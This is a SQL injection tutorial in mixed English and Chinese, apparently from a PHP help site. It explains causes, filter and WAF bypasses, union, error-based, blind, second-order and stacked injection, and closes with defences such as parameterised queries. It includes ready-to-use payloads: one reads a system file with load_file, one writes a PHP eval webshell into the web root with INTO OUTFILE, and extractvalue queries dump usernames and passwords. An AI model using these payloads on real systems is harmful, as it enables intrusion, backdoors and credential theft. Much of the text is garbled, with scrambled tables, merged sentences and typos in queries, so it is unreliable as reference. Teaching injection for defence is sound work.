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Take you to understand SQL injection (details)

Release: 2022-01-04 18:45:13
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This article brings you knowledge about sql injection. SQL injection is a behavior in which the server does not strictly verify the data sent by the client, causing the server-side SQL statement to be maliciously modified and successfully executed. I hope it will be useful to everyone. helpful.

What is SQL?

Structured Query Language (SQL) is a special programming language used for standard data queries in databases. In October 1986, the American National Standards Institute standardized SQL and used it as the standard language for relational database systems. In 1987, it received support from the International Standards Organization and became an international standard.

What is SQL injection

SQL injection is a behavior in which the server does not strictly verify the data sent by the client, resulting in the server's SQL statement being maliciously modified and successfully executed

Principle of Vulnerability

SQL injection attack behavior can be described as injecting SQL syntax into user-controllable parameters, destroying the original SQL structure, and achieving unexpected results when writing programs. The resulting attack behavior. The cause can be attributed to the superposition of the following two reasons.

  • When programmers interact with the program and the database, they use string concatenation to construct SQL statements.
  • There is insufficient filtering of user-controllable parameters. Then the parameter content is spliced into the SQL statement

Cause of the vulnerability

  • The user can control the input
  • The input check is insufficient, causing the SQL statement to be The illegal data submitted by the user is executed as part of the statement

Why is there SQL injection

  • The code does not strictly filter the parameters brought into the SQL statement
  • The security configuration of the framework is not enabled, for example: PHP's magic_quotes_gpc
  • The framework security query method is not used
  • The test interface is not deleted
  • The firewall is not enabled
  • No other security protection equipment is used

Possible location of the injection point

According to the principle of SQL injection vulnerability, the user injects SQL into the "controllable parameters" In other words, where the Web application obtains user input, as long as it is brought into the database query, there is the possibility of SQL injection. These places usually include:

  • GET data
  • POST data
  • Cookie data
  • HTTP header (other fields in the HTTP header)

Vulnerability hazard

  1. Database information leakage, acquisition, modification of sensitive data: leakage of users’ private information (account, password) stored in the database
  2. Bypass login verification: use a universal password to log in to the website backend, etc.
  3. File system operations: list directories, read, write files, etc.
  4. Web page tampering: tamper with specific web pages by operating the database, embed network horse links, and carry out horse-mounting attacks
  5. Registry operations: read, write, delete registry, etc.
  6. Execute system commands: execute commands remotely
  7. The server is remotely controlled and Trojans are planted: hackers can modify or control the operating system

Submission methods

Submission methods include: get, post, cookie, request, etc.
Among them: request support is better, you can use get method, post method, cookie method Submission is possible

Determine the injection point

Will try to submit data at the suspected injection point or behind the parameters to determine whether there is a SQL injection vulnerability .

Note: If when you test a website, 404 appears, or the page jumps, it means that the website is protected

Determine whether it is a character or a number

As shown below, generally Say, parameters such as id are followed by numeric type (may also be character type), and other parameters are followed by character type

sql injection bypass

  1. Case bypass
  2. Double-write keyword bypass
  3. Special encoding bypass

If some strings are really restricted , we can try some encoding bypass.
Such as URLEncode encoding, ASCII, HEX, and unicode encoding are bypassed:

  • or 1=1 or 1=1,
  • Test can also be CHAR(101) CHAR (97) CHAR(115) CHAR(116)
  1. Space filter bypass
  2. Filter function bypass
  • sleep() ——> benchmark()
  • substr(), substring(), and mid() can be replaced by each other
  • user() ——> @@ user(), datadir ——> @@datadir
  • ord() ——> ascii(): These two functions have the same effect when processing English, but they have different effects when processing Chinese
  • ascii ——> hex(), bin(): After replacement, use the corresponding base to convert to string
  • group_concat() ——> concat_ws()
  1. Inline comments bypass/*!...*/

In MySQL, /**/ is a multi-line comment. This is the SQL standard, but MySQL has expanded the explanation function. If an exclamation point is added after the /* at the beginning/*!50001sleep(3)*/, Then the statement in this comment will be executed.

/*!50001 select * from test */;50001 here means that this statement will only be executed if the database is version 5.00.01 or above. For some wafs, we can use this ways to bypass.

Get the website path

Common ways to obtain the path:

  1. Error display

  1. ##Legacy files


Prerequisites for use:

secure_file_priv, which parameter is in The import and export operations of files are restricted in higher versions of mysql database. To configure this parameter, you need to modify the my.ini configuration file and restart the mysql service [The default is NULL in Phpstudy, which does not allow reading and writing files]

##Don’t use Baidu, use Google to searchVulnerability error reporting, platform configuration files, blasting, etc.SQL injection reading and writing filesYou can use SQL injection vulnerabilities to read and write files.1. The database supports file reading and writingThis involves a variable
Test data Test judgment Attack ideas
-1 or 1 Whether the previous or next page can be echoed (to determine whether there is an echo) Joint injection
'or" Whether the database error message is displayed; whether the echoed page is different (character type or numeric type) Error injection
and 1=1 or and 1=2 Whether the echoed pages are different (determine whether the page has a Boolean type status) Boolean blind injection
and sleep(5) Judge the return time of the page Delay injection
\ Judgment Escape


2. 当前用户具有文件权限

  1. 获知当前用户和主机名
?id=-1'union select 1,current_user(),3 --+
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  1. 查看有无权限
?id=-1' union select 1,File_priv,3 from mysql.user where user="root" and host="localhost"--+
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select File_priv from mysql.user where user="root" and host="localhost";
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3. 知道文件绝对路径

  1. 读取文件,使用 load_file


?id=1' and 1=2 union select 1,load_file('c:\\windows\\system32\\drivers\\etc\\hosts'),3 --+ ?id=1' and 1=2 union select 1,load_file('c:/windows/system32/drivers/etc/hosts'),3 --+
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  1. 写入文件,使用 into_outfile



# 1. 直接写 ?id=-1' union select 1,'',3 into outfile 'c:\\phpstudy\\www\\hack.php'--+ # 2. 改写成16进制 ?id=1' and 1=2 union select 1,0x3c3f70687020706870696e666f28293b3f3e,3 into outfile 'c:/phpstudy/www/hack.php' --+
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# 1. 直接写 ?id=1' and 1=2 union select 1,'=@eval($_REQUEST[404])?>',3 into outfile 'c:/phpstudy/www/hack1.php' --+ # 2. 改写成16进制 ?id=1' and 1=2 union select 1,0x3c3f3d406576616c28245f524551554553545b3430345d293f3e,3 into outfile 'c:/phpstudy/www/hack1.php' --+
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更详细的介绍,请参见下一篇文章 《SQL注入的常见方式》



  1. select:查询数据在网站应用中进行数据显示查询操作

举例:select * from news where id=$id

  1. insert:插入数据在网站应用中进行用户注册添加等操作

举例:insert into news(id,url,text) values(2,'x','$t')

  1. delete:删除数据后台管理里面删除文章删除用户等操作

举例:delete from news where id=$id

  1. update更新数据会员或后台中心数据同步或缓存等操作

举例:update user set pwd='$p' where id=2 and username='admin'

  1. order by排序数据一般结合表名或列名进行数据排序操作

举例:select * from news order by $id
举例:select id,name,price from news order by $order



  1. 基于布尔的SQL盲注-逻辑判断(不回显)

  2. 基于时间的SQ盲注-延时判断(不回显)

  3. 基于报错的SQL盲注-(强制)报错回显



  1. floor()
  • floor(x),返回小于或等于x的最大整数。
  • payload:select conut(*),(concat(database(),rand(0)*2))x from infromation_schema.tables group by x;
  • x表示concat(database(),rand(0)*2),rand(0)以0为随机种子产生0-1之间的随机数,*2产生0-2之间的随机数。
  • 报错原因:主键重复,必需:count()、rand()、group by
  • 分析链接:https://xz.aliyun.com/t/253#toc-2
  1. exp()
  • exp(x)返回e^x。
  • 当x的值足够大的时候就会导致函数的结果数据类型溢出,也就会因此报错
  • payload:id =1 and EXP(~(SELECT * from(select user())a))
  1. updatexml()



  • 函数语法解析:
  • XML_document:是字符串String格式,为XML文档对象名称
  • Xpath_string:Xpath格式的字符串
  • new_value:string格式,替换查找到的符合条件的数据


利用方式:在执行两个函数时,如果出现xml文件路径错误,就会产生报错 那么我们就需要构造Xpath_string格式错误,也就是我们将Xpath_string的值传递成不符合格式的参数,mysql就会报错

  1. extractvalue()



1. 获取当前是数据库名称及使用mysql数据库的版本信息: and extractvalue(1,concat(0x7e,database(),0x7e,version(),0x7e)) 2. 获取当前注入点的用户权限信息及操作系统版本信息: and extractvalue(1,concat(0x7e,@@version_compile_os,0x7e,user(),0x7e)) 3. 获取当前位置所用数据库的位置: and extractvalue(1,concat(0x7e,@@datadir,0x7e)) 4. 获取数据表信息: and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) 5. 获取users数据表的列名信息: and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e)) 6. 获取对应的列名的信息(username\password): and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))
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  1. 插入恶意数据


  1. 引用恶意数据



  1. 首先看一下最开始的时候,靶机的数据库是什么样子的,这里以其中的用户dhakkan来演示

  1. 注册一个新用户

  1. 注册了一个新用户之后的数据库如下

  2. 新用户登录,并重置密码

  3. 查看数据库,有意思的事情发生了,dhakkan的密码改变了,但是新用户的密码没有改变

  1. In the source code of level 24, you can see the reason, as shown below

;is added at the end of each statement to indicate the end of the statement. In this way, we thought about whether we can use multiple sentences together. So stack injection (also called stack query) appeared

The conditions for use of stack injection are very limited, and may be restricted by API or database engine, or permissions It can only be used when the database function is called to support the execution of multiple SQL statements. The mysqli_multi_query() function supports the simultaneous execution of multiple SQL statements. However, in actual situations, such as PHP, in order to prevent the SQL injection mechanism, the function that calls the database is often used. The mysqli_query() function can only execute one statement, and the content after the semicolon will not be executed. Therefore, it can be said that the usage conditions of stack injection are very limited. Once it can be used, it may cause a great threat to the website

##Common databases and injection related⭐

The five databases of MySQL, SQLServer, Oracle, PostgreSQL, and Access should be the most popular databases on the market currently. When we conduct penetration testing, these are the types of databases we encounter the most. This article makes statistics on the similarities and differences between these types of databases during injection.

Comment character, database port

Parameters Meaning ##secure_file_priv=NULL secure_file_priv='c:/a/' secure_file_priv= ##Stacked queryStacked injection (Stacked injections), as you can see from the meaning of the noun, it should be a bunch of SQL statements (multiple) executed together. This is also the case in real applications. We know that in mysql, mainly in the command line,Notes:DNSlogDNSlog is the domain name information stored on the DNS Server. It records the user's access information to the domain name www.baidu.com, etc., similar to a log file. For more operations, please refer to A Brief Analysis of DNSlog’s Practical Skills in Penetration TestingBrain Map
Restrict mysqld to not allow import and export operations
will limit the import and export operations of mysqld to a fixed directory, and the subdirectory is valid
No restrictions on the import and export operations of mysqld


  • MySQL:数据文件:.myd、索引文件:.MYI、表定义文件:.frm
  • SQLServer:.mdf
  • Oracle:.dbf.ora
  • PostgreSQL:无后缀名
  • Access:Office 2007之前是.mdb,Office 2007及之后是.accdb


  • MySQL: information_schema(Mysql5.0以上的版本)
  • SQLServer:sysobjects
  • Oracle:dual
  • PostgreSQL:
  • Access:msysobjects


  1. MySQL
查询当前用户 select user(); select substring_index(user(), '@', 1) ; 查询当前用户的权限 select * from mysql.user where user = substring_index(user(), '@', 1) ;
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  1. SQLServer
判断是否是SA权限select is_srvrolemember('sysadmin') 判断是否是db_owner权限 select is_member('db_owner')判断是否是public权限select is_srvrolemember('public')
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  1. Oracle
查看当前用户select * from user_users;查看当前用户拥有的角色 select * from session_roles;查看当前用户拥有的权限select * from session_privs;
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  1. PostgreSQL
select user #查看用户select current_user #查看当前用户
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  1. MySQL:select char(97)

  1. SQLServer:select char(97)

  2. Oracle:select chr(97) from dual

  1. **PostgreSQL:select chr(97) **

  1. **Access:select chr(97) **

select chr(97)&chr(100)&chr(109)&chr(105)&chr(110)


  1. mssql

  1. MySQL

  1. oracle






返回结果为连接参数产生的字符串。如有任何一个参数为NULL ,则返回值为 NULL。可以有一个或多个参数。

concat_ws 函数


CONCAT_WS()代表 CONCAT With Separator ,是CONCAT()的特殊形式。第一个参数是其它参数的分隔符。分隔符的位置放在要连接的两个字符串之间。分隔符可以是一个字符串,也可以是其它参数。

注意:如果分隔符为 NULL,则结果为 NULL。函数会忽略任何分隔符参数后的 NULL 值。

group_concat 函数


mysql> select * from aa; +------+------+ | id| name | +------+------+ |1 | 10| |1 | 20| |1 | 20| |2 | 20| |3 | 200 | |3 | 500 | +------+------+ 6 rows in set (0.00 sec)
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mysql> select id,group_concat(name) from aa group by id; +------+--------------------+ | id| group_concat(name) | +------+--------------------+ |1 | 10,20,20| |2 | 20 | |3 | 200,500| +------+--------------------+ 3 rows in set (0.00 sec)
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mysql> select id,group_concat(name separator ';') from aa group by id; +------+----------------------------------+ | id| group_concat(name separator ';') | +------+----------------------------------+ |1 | 10;20;20 | |2 | 20| |3 | 200;500 | +------+----------------------------------+ 3 rows in set (0.00 sec)
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mysql> select id,group_concat(distinct name) from aa group by id; +------+-----------------------------+ | id| group_concat(distinct name) | +------+-----------------------------+ |1 | 10,20| |2 | 20 | |3 | 200,500 | +------+-----------------------------+ 3 rows in set (0.00 sec)
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mysql> select id,group_concat(name order by name desc) from aa group by id; +------+---------------------------------------+ | id| group_concat(name order by name desc) | +------+---------------------------------------+ |1 | 20,20,10 | |2 | 20| |3 | 500,200| +------+---------------------------------------+ 3 rows in set (0.00 sec)
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数据库结构:数据库 —> 表名 —> 列名 —> 数据

  1. 查看MySQL数据库中,包含了哪些数据库

show database;

  1. 查看数据库中有哪些表
use dvwa; # 选中dvwa数据库 show tables; # 查看dvwa数据库中有哪些表
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  1. 查询表中的内容
    1. 查看user表中的全部内容:select * from user;
    2. 以列的形式查看user表中的全部内容:select *from user\G;
    3. 查看表中的部分内容:select user,password from user;



SQLServer Oracle PostgreSQL Access Single line comment Multi-line comments 3306 1433 1521 5432 is a file database, so No port number required
#-- -- -- none
/**/ /**/ /**&*/ None Database port
减减空格 "-- " "–%20" “–+”
# “#” "%23"

内联注释 /* 被注释掉的内容 */



1:mysql -uroot -proot登录数据库
2:show databases; 查看有哪些数据库
3:use informatin_schema; 使用某数据库

  • limit的使用格式是limit m,n
  • 其中m是指记录开始的位置,从0开始表示第一条记录
  • n是指提取n条记录

5:select 函数名; 查询某内容




  1. 内置过滤系统(本质是黑名单,很常见但是不推荐)
  2. 采用参数化查询&预编译(推荐)


  1. 采用框架的安全写法


Thinkphp框架的安全写法 安全的替换写法 $data=M('Member')->where(array('id'=>$_GET['id']))->find();//使用数组方式将自动使用框架自带的字段类型检测防止注入 $data=M('Member')->where(array('id'=>(int)$_GET['id']))->find();//类型约束 $data=M('Member')->where('id='.intval($_GET['id']))->find();//类型转换 $data=M('Member')->where(array('id'=>I('get.id','','intval')))->find();//$data=M('Member')- >where(array('id'=>':id'))->bind(':id',I('get.id'))->select();//PDO驱动可以使用参数绑定 $data=M('Member')->where("id=%d",array($_GET['id']))->find();//预处理机制 //不安全的写法举例 $_GET['id']=8;//希望得到的是正整数 $data=M()->query('SELECT * FROM `member` WHERE id='.$_GET['id']);//执行的SQL语句 $_GET['id']='8 UNION SELECT * FROM `member`';;//隐患:构造畸形语句进行注入;
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  1. 最小权限原则,禁止将任何高权限帐户(例如sa、dba、root等)用于应用程序数据库访问。更安全的方法是单独为应用创建有限访问帐户。
  2. 禁用敏感函数拒绝用户访问敏感的系统存储过程,如xp_dirtree、xp_cmdshell、into_outfile 等
  3. 网站与数据层的编码统一,建议全部使用UTF-8编码,避免因上下层编码不一致导致一些过滤模型被绕过,比如宽字节注入等。
  4. 限制用户所能够访问的数据库表




The above is the detailed content of Take you to understand SQL injection (details). For more information, please follow other related articles on the PHP Chinese website!

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